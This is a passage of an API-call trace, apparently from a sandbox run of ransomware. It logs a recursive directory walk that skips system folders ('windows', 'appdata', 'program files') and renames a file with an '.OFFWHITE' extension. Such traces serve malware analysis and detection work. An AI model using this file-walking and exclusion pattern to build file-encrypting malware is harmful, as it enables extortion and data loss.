dwFlags=0x0, lpMem=0x543a60 | out: hHeap=0x500000) returned 1 [0146.853] GetProcessHeap () returned 0x500000 [0146.854] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543a48 | out: hHeap=0x500000) returned 1 [0146.854] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" [0146.854] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.OFFWHITE" [0146.854] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp"), lpNewFileName="C:/Users\\All Users\\Microsoft\\User Account Pictures\\user.bmp.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\user.bmp.offwhite")) returned 1 [0146.854] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="user.bmp", cAlternateFileName="")) returned 0 [0146.855] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.855] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Vault", cAlternateFileName="")) returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2=".") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="..") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="...") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="windows") returned -1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="$recycle.bin") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="rsa") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="ntuser.dat") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="programdata") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="appdata") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="program files") returned 1 [0146.855] lstrcmpiW (lpString1="Vault", lpString2="program files (x86)") returned 1 [0146.855] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.855] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Vault" | out: lpString1="C:/Users\\All Users\\Microsoft\\Vault") returned="C:/Users\\All Users\\Microsoft\\Vault" [0146.855] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Vault", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Vault\\") returned="C:/Users\\All Users\\Microsoft\\Vault\\" [0146.855] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Vault\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Vault\\") returned="C:/Users\\All Users\\Microsoft\\Vault\\" [0146.855] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Vault\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Vault\\*.*") returned="C:/Users\\All Users\\Microsoft\\Vault\\*.*" [0146.855] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Vault\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.856] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.856] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.856] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.856] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.856] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd9b5b52, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xc602eec6, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 0 [0146.856] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.856] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="VISIO", cAlternateFileName="")) returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2=".") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="..") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="...") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="windows") returned -1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="$recycle.bin") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="rsa") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="ntuser.dat") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="programdata") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="appdata") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="program files") returned 1 [0146.856] lstrcmpiW (lpString1="VISIO", lpString2="program files (x86)") returned 1 [0146.856] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.857] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="VISIO" | out: lpString1="C:/Users\\All Users\\Microsoft\\VISIO") returned="C:/Users\\All Users\\Microsoft\\VISIO" [0146.857] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\VISIO", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\VISIO\\") returned="C:/Users\\All Users\\Microsoft\\VISIO\\" [0146.857] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\VISIO\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\VISIO\\") returned="C:/Users\\All Users\\Microsoft\\VISIO\\" [0146.857] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\VISIO\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\VISIO\\*.*") returned="C:/Users\\All Users\\Microsoft\\VISIO\\*.*" [0146.857] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\VISIO\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.858] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.858] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.858] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.858] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.858] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x80ac5760, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 0 [0146.858] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0146.858] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x60ae73a0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x60ae73a0, ftLastWriteTime.dwHighDateTime=0x1d2de2a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Windows", cAlternateFileName="")) returned 1 [0146.858] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0146.858] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0146.858] lstrcmpiW (lpString1="Windows", lpString2="...") returned 1 [0146.858] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0146.858] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2e002c, dwReserved1=0x295f070, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1 [0146.858] lstrcmpiW (lpString1="Windows Defender", lpString2=".") returned 1 [0146.858] lstrcmpiW (lpString1="Windows Defender", lpString2="..") returned 1 [0146.858] lstrcmpiW (lpString1="Windows Defender", lpString2="...") returned 1 [0146.858] lstrcmpiW (lpString1="Windows Defender", lpString2="windows") returned 1 [0146.858] lstrcmpiW (lpString1="Windows Defender", lpString2="$recycle.bin") returned 1 [0146.859] lstrcmpiW (lpString1="Windows Defender", lpString2="rsa") returned 1 [0146.859] lstrcmpiW (lpString1="Windows Defender", lpString2="ntuser.dat") returned 1 [0146.859] lstrcmpiW (lpString1="Windows Defender", lpString2="programdata") returned 1 [0146.859] lstrcmpiW (lpString1="Windows Defender", lpString2="appdata") returned 1 [0146.859] lstrcmpiW (lpString1="Windows Defender", lpString2="program files") returned 1 [0146.859] lstrcmpiW (lpString1="Windows Defender", lpString2="program files (x86)") returned 1 [0146.859] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\All Users\\Microsoft\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\") returned="C:/Users\\All Users\\Microsoft\\" [0146.859] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\", lpString2="Windows Defender" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender") returned="C:/Users\\All Users\\Microsoft\\Windows Defender" [0146.859] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0146.859] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0146.859] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\*.*" [0146.859] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName=".", cAlternateFileName="")) returned 0x544650 [0146.866] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.866] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x591e8ca0, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0x591e8ca0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="..", cAlternateFileName="")) returned 1 [0146.942] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.942] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.942] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x420040, dwReserved1=0x295e9f0, cFileName="Definition Updates", cAlternateFileName="DEFINI~1")) returned 1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2=".") returned 1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="..") returned 1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="...") returned 1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="windows") returned -1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="$recycle.bin") returned 1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="rsa") returned -1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="ntuser.dat") returned -1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="programdata") returned -1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="appdata") returned 1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="program files") returned -1 [0146.942] lstrcmpiW (lpString1="Definition Updates", lpString2="program files (x86)") returned -1 [0146.942] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\" [0146.942] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\", lpString2="Definition Updates" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates" [0146.942] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" [0146.942] lstrcpyW (in: lpString1=0x295dcf0, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" [0146.942] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*" [0146.942] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\*.*", lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName=".", cAlternateFileName="")) returned 0x544590 [0146.943] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.943] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1fb3099, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x1fb3099, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="..", cAlternateFileName="")) returned 1 [0146.943] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.943] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.943] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="Backup", cAlternateFileName="")) returned 1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2=".") returned 1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="..") returned 1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="...") returned 1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="windows") returned -1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="$recycle.bin") returned 1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="rsa") returned -1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="ntuser.dat") returned -1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="programdata") returned -1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="appdata") returned 1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="program files") returned -1 [0146.943] lstrcmpiW (lpString1="Backup", lpString2="program files (x86)") returned -1 [0146.943] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" [0146.943] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="Backup" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup" [0146.944] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\" [0146.944] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\" [0146.944] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*" [0146.944] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName=".", cAlternateFileName="")) returned 0x544750 [0146.945] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0146.945] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 1 [0146.945] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0146.945] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0146.945] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8a0088, dwReserved1=0x295dcf0, cFileName="..", cAlternateFileName="")) returned 0 [0146.945] FindClose (in: hFindFile=0x544750 | out: hFindFile=0x544750) returned 1 [0146.945] FindNextFileW (in: hFindFile=0x544590, lpFindFileData=0x295d898 | out: lpFindFileData=0x295d898*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x640062, dwReserved1=0x295e370, cFileName="Updates", cAlternateFileName="")) returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2=".") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="..") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="...") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="windows") returned -1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="$recycle.bin") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="rsa") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="ntuser.dat") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="programdata") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="appdata") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="program files") returned 1 [0146.945] lstrcmpiW (lpString1="Updates", lpString2="program files (x86)") returned 1 [0146.945] lstrcpyW (in: lpString1=0x295dae8, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\" [0146.945] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\", lpString2="Updates" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates" [0146.945] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates", lpString2="\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\" [0146.946] lstrcpyW (in: lpString1=0x295d670, lpString2="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\" [0146.946] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\", lpString2="*.*" | out: lpString1="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*") returned="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*" [0146.946] FindFirstFileW (in: lpFileName="C:/Users\\All Users\\Microsoft\\Windows Defender\\Definition Updates\\Updates\\*.*", lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, 